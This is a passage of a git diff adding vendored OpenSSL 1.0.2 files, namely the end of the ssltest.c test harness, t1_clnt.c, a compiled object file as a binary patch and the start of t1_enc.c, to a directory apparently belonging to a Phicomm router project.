+                case '|':
+                    ok |= save_ok;
+                    break;
+                default:
+                    fprintf(stderr, "SOMETHING IS SERIOUSLY WRONG!"
+                            " STOPPING\n");
+                    EXIT(1);
+                }
+            }
+            break;
+        default:
+            goto end;
+        }
+    }
+ end:
+    if (debug)
+        process_proxy_debug(indent,
+                            "End process_proxy_cond_adders at position %d: %s, returning %d\n",
+                            *pos, cond, ok);
+
+    *cond_end = cond;
+    return ok;
+}
+
+static int process_proxy_cond(unsigned int letters[26],
+                              const char *cond, const char **cond_end)
+{
+    int pos = 1;
+    return process_proxy_cond_adders(letters, cond, cond_end, &pos, 1);
+}
+
+static int MS_CALLBACK app_verify_callback(X509_STORE_CTX *ctx, void *arg)
+{
+    int ok = 1;
+    struct app_verify_arg *cb_arg = arg;
+    unsigned int letters[26];   /* only used with proxy_auth */
+
+    if (cb_arg->app_verify) {
+        char *s = NULL, buf[256];
+
+        fprintf(stderr, "In app_verify_callback, allowing cert. ");
+        fprintf(stderr, "Arg is: %s\n", cb_arg->string);
+        fprintf(stderr,
+                "Finished printing do we have a context? 0x%p a cert? 0x%p\n",
+                (void *)ctx, (void *)ctx->cert);
+        if (ctx->cert)
+            s = X509_NAME_oneline(X509_get_subject_name(ctx->cert), buf, 256);
+        if (s != NULL) {
+            fprintf(stderr, "cert depth=%d %s\n", ctx->error_depth, buf);
+        }
+        return (1);
+    }
+    if (cb_arg->proxy_auth) {
+        int found_any = 0, i;
+        char *sp;
+
+        for (i = 0; i < 26; i++)
+            letters[i] = 0;
+        for (sp = cb_arg->proxy_auth; *sp; sp++) {
+            int c = *sp;
+            if (isascii(c) && isalpha(c)) {
+                if (islower(c))
+                    c = toupper(c);
+                letters[c - 'A'] = 1;
+            }
+        }
+
+        fprintf(stderr, "  Initial proxy rights = ");
+        for (i = 0; i < 26; i++)
+            if (letters[i]) {
+                fprintf(stderr, "%c", i + 'A');
+                found_any = 1;
+            }
+        if (!found_any)
+            fprintf(stderr, "none");
+        fprintf(stderr, "\n");
+
+        X509_STORE_CTX_set_ex_data(ctx,
+                                   get_proxy_auth_ex_data_idx(), letters);
+    }
+    if (cb_arg->allow_proxy_certs) {
+        X509_STORE_CTX_set_flags(ctx, X509_V_FLAG_ALLOW_PROXY_CERTS);
+    }
+#ifndef OPENSSL_NO_X509_VERIFY
+    ok = X509_verify_cert(ctx);
+#endif
+
+    if (cb_arg->proxy_auth) {
+        if (ok > 0) {
+            const char *cond_end = NULL;
+
+            ok = process_proxy_cond(letters, cb_arg->proxy_cond, &cond_end);
+
+            if (ok < 0)
+                EXIT(3);
+            if (*cond_end) {
+                fprintf(stderr,
+                        "Stopped processing condition before it's end.\n");
+                ok = 0;
+            }
+            if (!ok)
+                fprintf(stderr,
+                        "Proxy rights check with condition '%s' proved invalid\n",
+                        cb_arg->proxy_cond);
+            else
+                fprintf(stderr,
+                        "Proxy rights check with condition '%s' proved valid\n",
+                        cb_arg->proxy_cond);
+        }
+    }
+    return (ok);
+}
+
+#ifndef OPENSSL_NO_RSA
+static RSA *rsa_tmp = NULL;
+
+static RSA MS_CALLBACK *tmp_rsa_cb(SSL *s, int is_export, int keylength)
+{
+    BIGNUM *bn = NULL;
+    if (rsa_tmp == NULL) {
+        bn = BN_new();
+        rsa_tmp = RSA_new();
+        if (!bn || !rsa_tmp || !BN_set_word(bn, RSA_F4)) {
+            BIO_printf(bio_err, "Memory error...");
+            goto end;
+        }
+        BIO_printf(bio_err, "Generating temp (%d bit) RSA key...", keylength);
+        (void)BIO_flush(bio_err);
+        if (!RSA_generate_key_ex(rsa_tmp, keylength, bn, NULL)) {
+            BIO_printf(bio_err, "Error generating key.");
+            RSA_free(rsa_tmp);
+            rsa_tmp = NULL;
+        }
+ end:
+        BIO_printf(bio_err, "\n");
+        (void)BIO_flush(bio_err);
+    }
+    if (bn)
+        BN_free(bn);
+    return (rsa_tmp);
+}
+
+static void free_tmp_rsa(void)
+{
+    if (rsa_tmp != NULL) {
+        RSA_free(rsa_tmp);
+        rsa_tmp = NULL;
+    }
+}
+#endif
+
+#ifndef OPENSSL_NO_DH
+/*-
+ * These DH parameters have been generated as follows:
+ *    $ openssl dhparam -C -noout 512
+ *    $ openssl dhparam -C -noout 1024
+ *    $ openssl dhparam -C -noout -dsaparam 1024
+ * (The third function has been renamed to avoid name conflicts.)
+ */
+static DH *get_dh512()
+{
+    static unsigned char dh512_p[] = {
+        0xCB, 0xC8, 0xE1, 0x86, 0xD0, 0x1F, 0x94, 0x17, 0xA6, 0x99, 0xF0,
+        0xC6,
+        0x1F, 0x0D, 0xAC, 0xB6, 0x25, 0x3E, 0x06, 0x39, 0xCA, 0x72, 0x04,
+        0xB0,
+        0x6E, 0xDA, 0xC0, 0x61, 0xE6, 0x7A, 0x77, 0x25, 0xE8, 0x3B, 0xB9,
+        0x5F,
+        0x9A, 0xB6, 0xB5, 0xFE, 0x99, 0x0B, 0xA1, 0x93, 0x4E, 0x35, 0x33,
+        0xB8,
+        0xE1, 0xF1, 0x13, 0x4F, 0x59, 0x1A, 0xD2, 0x57, 0xC0, 0x26, 0x21,
+        0x33,
+        0x02, 0xC5, 0xAE, 0x23,
+    };
+    static unsigned char dh512_g[] = {
+        0x02,
+    };
+    DH *dh;
+
+    if ((dh = DH_new()) == NULL)
+        return (NULL);
+    dh->p = BN_bin2bn(dh512_p, sizeof(dh512_p), NULL);
+    dh->g = BN_bin2bn(dh512_g, sizeof(dh512_g), NULL);
+    if ((dh->p == NULL) || (dh->g == NULL)) {
+        DH_free(dh);
+        return (NULL);
+    }
+    return (dh);
+}
+
+static DH *get_dh1024()
+{
+    static unsigned char dh1024_p[] = {
+        0xF8, 0x81, 0x89, 0x7D, 0x14, 0x24, 0xC5, 0xD1, 0xE6, 0xF7, 0xBF,
+        0x3A,
+        0xE4, 0x90, 0xF4, 0xFC, 0x73, 0xFB, 0x34, 0xB5, 0xFA, 0x4C, 0x56,
+        0xA2,
+        0xEA, 0xA7, 0xE9, 0xC0, 0xC0, 0xCE, 0x89, 0xE1, 0xFA, 0x63, 0x3F,
+        0xB0,
+        0x6B, 0x32, 0x66, 0xF1, 0xD1, 0x7B, 0xB0, 0x00, 0x8F, 0xCA, 0x87,
+        0xC2,
+        0xAE, 0x98, 0x89, 0x26, 0x17, 0xC2, 0x05, 0xD2, 0xEC, 0x08, 0xD0,
+        0x8C,
+        0xFF, 0x17, 0x52, 0x8C, 0xC5, 0x07, 0x93, 0x03, 0xB1, 0xF6, 0x2F,
+        0xB8,
+        0x1C, 0x52, 0x47, 0x27, 0x1B, 0xDB, 0xD1, 0x8D, 0x9D, 0x69, 0x1D,
+        0x52,
+        0x4B, 0x32, 0x81, 0xAA, 0x7F, 0x00, 0xC8, 0xDC, 0xE6, 0xD9, 0xCC,
+        0xC1,
+        0x11, 0x2D, 0x37, 0x34, 0x6C, 0xEA, 0x02, 0x97, 0x4B, 0x0E, 0xBB,
+        0xB1,
+        0x71, 0x33, 0x09, 0x15, 0xFD, 0xDD, 0x23, 0x87, 0x07, 0x5E, 0x89,
+        0xAB,
+        0x6B, 0x7C, 0x5F, 0xEC, 0xA6, 0x24, 0xDC, 0x53,
+    };
+    static unsigned char dh1024_g[] = {
+        0x02,
+    };
+    DH *dh;
+
+    if ((dh = DH_new()) == NULL)
+        return (NULL);
+    dh->p = BN_bin2bn(dh1024_p, sizeof(dh1024_p), NULL);
+    dh->g = BN_bin2bn(dh1024_g, sizeof(dh1024_g), NULL);
+    if ((dh->p == NULL) || (dh->g == NULL)) {
+        DH_free(dh);
+        return (NULL);
+    }
+    return (dh);
+}
+
+static DH *get_dh1024dsa()
+{
+    static unsigned char dh1024_p[] = {
+        0xC8, 0x00, 0xF7, 0x08, 0x07, 0x89, 0x4D, 0x90, 0x53, 0xF3, 0xD5,
+        0x00,
+        0x21, 0x1B, 0xF7, 0x31, 0xA6, 0xA2, 0xDA, 0x23, 0x9A, 0xC7, 0x87,
+        0x19,
+        0x3B, 0x47, 0xB6, 0x8C, 0x04, 0x6F, 0xFF, 0xC6, 0x9B, 0xB8, 0x65,
+        0xD2,
+        0xC2, 0x5F, 0x31, 0x83, 0x4A, 0xA7, 0x5F, 0x2F, 0x88, 0x38, 0xB6,
+        0x55,
+        0xCF, 0xD9, 0x87, 0x6D, 0x6F, 0x9F, 0xDA, 0xAC, 0xA6, 0x48, 0xAF,
+        0xFC,
+        0x33, 0x84, 0x37, 0x5B, 0x82, 0x4A, 0x31, 0x5D, 0xE7, 0xBD, 0x52,
+        0x97,
+        0xA1, 0x77, 0xBF, 0x10, 0x9E, 0x37, 0xEA, 0x64, 0xFA, 0xCA, 0x28,
+        0x8D,
+        0x9D, 0x3B, 0xD2, 0x6E, 0x09, 0x5C, 0x68, 0xC7, 0x45, 0x90, 0xFD,
+        0xBB,
+        0x70, 0xC9, 0x3A, 0xBB, 0xDF, 0xD4, 0x21, 0x0F, 0xC4, 0x6A, 0x3C,
+        0xF6,
+        0x61, 0xCF, 0x3F, 0xD6, 0x13, 0xF1, 0x5F, 0xBC, 0xCF, 0xBC, 0x26,
+        0x9E,
+        0xBC, 0x0B, 0xBD, 0xAB, 0x5D, 0xC9, 0x54, 0x39,
+    };
+    static unsigned char dh1024_g[] = {
+        0x3B, 0x40, 0x86, 0xE7, 0xF3, 0x6C, 0xDE, 0x67, 0x1C, 0xCC, 0x80,
+        0x05,
+        0x5A, 0xDF, 0xFE, 0xBD, 0x20, 0x27, 0x74, 0x6C, 0x24, 0xC9, 0x03,
+        0xF3,
+        0xE1, 0x8D, 0xC3, 0x7D, 0x98, 0x27, 0x40, 0x08, 0xB8, 0x8C, 0x6A,
+        0xE9,
+        0xBB, 0x1A, 0x3A, 0xD6, 0x86, 0x83, 0x5E, 0x72, 0x41, 0xCE, 0x85,
+        0x3C,
+        0xD2, 0xB3, 0xFC, 0x13, 0xCE, 0x37, 0x81, 0x9E, 0x4C, 0x1C, 0x7B,
+        0x65,
+        0xD3, 0xE6, 0xA6, 0x00, 0xF5, 0x5A, 0x95, 0x43, 0x5E, 0x81, 0xCF,
+        0x60,
+        0xA2, 0x23, 0xFC, 0x36, 0xA7, 0x5D, 0x7A, 0x4C, 0x06, 0x91, 0x6E,
+        0xF6,
+        0x57, 0xEE, 0x36, 0xCB, 0x06, 0xEA, 0xF5, 0x3D, 0x95, 0x49, 0xCB,
+        0xA7,
+        0xDD, 0x81, 0xDF, 0x80, 0x09, 0x4A, 0x97, 0x4D, 0xA8, 0x22, 0x72,
+        0xA1,
+        0x7F, 0xC4, 0x70, 0x56, 0x70, 0xE8, 0x20, 0x10, 0x18, 0x8F, 0x2E,
+        0x60,
+        0x07, 0xE7, 0x68, 0x1A, 0x82, 0x5D, 0x32, 0xA2,
+    };
+    DH *dh;
+
+    if ((dh = DH_new()) == NULL)
+        return (NULL);
+    dh->p = BN_bin2bn(dh1024_p, sizeof(dh1024_p), NULL);
+    dh->g = BN_bin2bn(dh1024_g, sizeof(dh1024_g), NULL);
+    if ((dh->p == NULL) || (dh->g == NULL)) {
+        DH_free(dh);
+        return (NULL);
+    }
+    dh->length = 160;
+    return (dh);
+}
+#endif
+
+#ifndef OPENSSL_NO_PSK
+/* convert the PSK key (psk_key) in ascii to binary (psk) */
+static int psk_key2bn(const char *pskkey, unsigned char *psk,
+                      unsigned int max_psk_len)
+{
+    int ret;
+    BIGNUM *bn = NULL;
+
+    ret = BN_hex2bn(&bn, pskkey);
+    if (!ret) {
+        BIO_printf(bio_err, "Could not convert PSK key '%s' to BIGNUM\n",
+                   pskkey);
+        if (bn)
+            BN_free(bn);
+        return 0;
+    }
+    if (BN_num_bytes(bn) > (int)max_psk_len) {
+        BIO_printf(bio_err,
+                   "psk buffer of callback is too small (%d) for key (%d)\n",
+                   max_psk_len, BN_num_bytes(bn));
+        BN_free(bn);
+        return 0;
+    }
+    ret = BN_bn2bin(bn, psk);
+    BN_free(bn);
+    return ret;
+}
+
+static unsigned int psk_client_callback(SSL *ssl, const char *hint,
+                                        char *identity,
+                                        unsigned int max_identity_len,
+                                        unsigned char *psk,
+                                        unsigned int max_psk_len)
+{
+    int ret;
+    unsigned int psk_len = 0;
+
+    ret = BIO_snprintf(identity, max_identity_len, "Client_identity");
+    if (ret < 0)
+        goto out_err;
+    if (debug)
+        fprintf(stderr, "client: created identity '%s' len=%d\n", identity,
+                ret);
+    ret = psk_key2bn(psk_key, psk, max_psk_len);
+    if (ret < 0)
+        goto out_err;
+    psk_len = ret;
+ out_err:
+    return psk_len;
+}
+
+static unsigned int psk_server_callback(SSL *ssl, const char *identity,
+                                        unsigned char *psk,
+                                        unsigned int max_psk_len)
+{
+    unsigned int psk_len = 0;
+
+    if (strcmp(identity, "Client_identity") != 0) {
+        BIO_printf(bio_err, "server: PSK error: client identity not found\n");
+        return 0;
+    }
+    psk_len = psk_key2bn(psk_key, psk, max_psk_len);
+    return psk_len;
+}
+#endif
+
+static int do_test_cipherlist(void)
+{
+    int i = 0;
+    const SSL_METHOD *meth;
+    const SSL_CIPHER *ci, *tci = NULL;
+
+#ifndef OPENSSL_NO_SSL2
+    fprintf(stderr, "testing SSLv2 cipher list order: ");
+    meth = SSLv2_method();
+    while ((ci = meth->get_cipher(i++)) != NULL) {
+        if (tci != NULL)
+            if (ci->id >= tci->id) {
+                fprintf(stderr, "failed %lx vs. %lx\n", ci->id, tci->id);
+                return 0;
+            }
+        tci = ci;
+    }
+    fprintf(stderr, "ok\n");
+#endif
+#ifndef OPENSSL_NO_SSL3
+    fprintf(stderr, "testing SSLv3 cipher list order: ");
+    meth = SSLv3_method();
+    tci = NULL;
+    while ((ci = meth->get_cipher(i++)) != NULL) {
+        if (tci != NULL)
+            if (ci->id >= tci->id) {
+                fprintf(stderr, "failed %lx vs. %lx\n", ci->id, tci->id);
+                return 0;
+            }
+        tci = ci;
+    }
+    fprintf(stderr, "ok\n");
+#endif
+#ifndef OPENSSL_NO_TLS1
+    fprintf(stderr, "testing TLSv1 cipher list order: ");
+    meth = TLSv1_method();
+    tci = NULL;
+    while ((ci = meth->get_cipher(i++)) != NULL) {
+        if (tci != NULL)
+            if (ci->id >= tci->id) {
+                fprintf(stderr, "failed %lx vs. %lx\n", ci->id, tci->id);
+                return 0;
+            }
+        tci = ci;
+    }
+    fprintf(stderr, "ok\n");
+#endif
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_clnt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_clnt.c
new file mode 100644
index 0000000..746b4e6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_clnt.c
@@ -0,0 +1,90 @@
+/* ssl/t1_clnt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+
+static const SSL_METHOD *tls1_get_client_method(int ver);
+static const SSL_METHOD *tls1_get_client_method(int ver)
+{
+    if (ver == TLS1_2_VERSION)
+        return TLSv1_2_client_method();
+    if (ver == TLS1_1_VERSION)
+        return TLSv1_1_client_method();
+    if (ver == TLS1_VERSION)
+        return TLSv1_client_method();
+    return NULL;
+}
+
+IMPLEMENT_tls_meth_func(TLS1_2_VERSION, TLSv1_2_client_method,
+                        ssl_undefined_function,
+                        ssl3_connect,
+                        tls1_get_client_method, TLSv1_2_enc_data)
+
+    IMPLEMENT_tls_meth_func(TLS1_1_VERSION, TLSv1_1_client_method,
+                        ssl_undefined_function,
+                        ssl3_connect,
+                        tls1_get_client_method, TLSv1_1_enc_data)
+
+    IMPLEMENT_tls_meth_func(TLS1_VERSION, TLSv1_client_method,
+                        ssl_undefined_function,
+                        ssl3_connect, tls1_get_client_method, TLSv1_enc_data)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_clnt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_clnt.o
new file mode 100644
index 0000000000000000000000000000000000000000..c41739d0cfe0da448377cd58b5f268e4a24dda68
GIT binary patch
literal 6216
zcmd^@O^g&p6vu0J_*ey5L`4wA0YO2eGXop>IG9ORWDgsI9~fgaO>a-_&V-qs$xIC_
znjpl>9yD2RcrYQJh!;(~5Klxd96WH7Bi{CEjEONM>wDd=X8zT5UG&IHdf%&G)vK@m
zcXiKxeroQmiBd^fE2%fsxMZnP%TJHvdK%W%l-i>HoZ9`*>{siVTwN=dl`{KB#R)EM
zzq(c;FYsq>I6HOfm)nr&jj1i?KFY>>_$V7o>XES1GczYE2hPq96Em!w2#yBT!?k0>
zv{<`*q#9JG4`w*qjdkR<(#22S>9^0S38ii^v)g4K*V3o&s?yTd(yq-LCs*jf=A7s0
zVmpz!lvO3(4D8JU_F;}m@gc`&$U61M+Cvot%7rHkb31!Ct4uxRZ4-eB=*O;QFYyxZ
z3T+76YUb1o`IO7yW_iPMX=gbX%jxb)1-P=Bgwi-HtH;I#h|215D2>Ci+Bhyq^ac5C
zG*i1Cdq2JreoER|{)6y$a{M-x`CjMkR{}-+HxK{a!~gd1^`bGVc5KSScY63f4?p7J
zGamkthoATG&piA~55Ml=-+TB?55Mc-s~-NBhi@R=7v10O9)8HfPkQ(V9^UfsD<1x}
zhbvPH<91?#Sef>q7A|T-<(5uN*wLohZK(I>-n&o>kGM2!L?#Mq)6>VQ(tx{xv~h!J
zY2c|oUOYf?uSH#D^G@`|EQs4W>Sy6XUu!iOw8LT2&<m|ZH^PNs5}Q^xVSF@<yGf#B
zlNI_pYGhGQ>+@N3vEMRj7e~WEb7&gfi;~&biC*lQR%ELIgmF{H(gAO0M-K+kqIAQf
zg!7k-9>53)8m&PuGI2AE+PW`Oi%q|sHIL0wI4-3(tJQ1jKJ`Gu(!$eq^@em4i?~i2
ztz<E4lngu4NTxFGE!#fYvuM~hp=ot=cW7kqbrPrdmOFusz0hqvw7XHeJs-vAVZ!P3
z9h|AF7LK~LavOo{ShFWL$v8drAJFs2wmoy{>xbV452So3&(|`m=ehJVm*-Np@88k5
z(vN*3ar%?emYqEdm~R8VLt^Gn0j~hJ-w=!r0Dneec2(eZ?Tn5Ce^z34b%}XgI|oLy
zz;{Z_?hNqffZKiGes%#rCoyyTox`XJ`~`{G^?>gNz6AV5;8%cGfG-2z1AGPeUf|b&
zzXbd`@O{8<0N)S%N8m35zX_bRV(pd$yg#p4Nd6A+1HkVBKM4FD@K=G~2W~abXp#pc
zW9R4-xT8<tjy{1q`ULLi6S$*K;Eq0l??`8y{h0;s=o7f3PvDL|fjjyH?&uS^qfg+D
zK7m(Y{>#Ak0O#KXZ0sC;0(bNY+|eg+N1wnQeFAs%3Ea^q@Ym8AXMgy+iH)73PvDL|
zfjjz?NpQ8JPvDL|fjjyH?&uS^qfg+DK7l*>1n%e)xT8<tjy{1q`ULLi6S$*K;Eq0l
zJNg7(p}n@Y41AA;<X3?21%3^<qfg+DK7l*>1n%e)xP<BGw}3nP1b!Iic^9~&PvDL|
zfulYv(kE9-lax&7_z5Y`=D7Xc_;HTg-;F95T<Vx;p1kR2zG<VrZbyO9OGX9!nXQ8P
z!9WEmO+ULS3i@3Y#NAGZKGao^bd3(^zY>QBhQ7C?yqFAwUccL;ugFW1t()OOKk8_i
z)BkZ5O6F&GL#~s$lt0OFIR-|QpMiCB)kh=?j&I7meUJ0+ZqA*|@aP+cwZptD+`4aV
zkn{QR`Ap+J|7-s1lv_0Zb>eKRC>knP7=qO(E?WN`S^s_c;N|tNrz^ky8Dczsl`gbp
zSrBTO>+Sljp96;ZKjk+>Ds7%^%ev+%=9Z~$N`A#Q6mREmv7vzb%;(>e{HARvKA+zu
zUbKHV<mGTq@_7IFzd<(Np5aAfb4r~%B|9Vj35vJSmCxtj8bw>RA`QRGEiAu({LU-N
OpOlx_WvWNZ=l=^;*T9_s

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_enc.c
new file mode 100644
index 0000000..0f5baa6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_enc.c
@@ -0,0 +1,1337 @@
+/* ssl/t1_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_COMP
+# include <openssl/comp.h>
+#endif
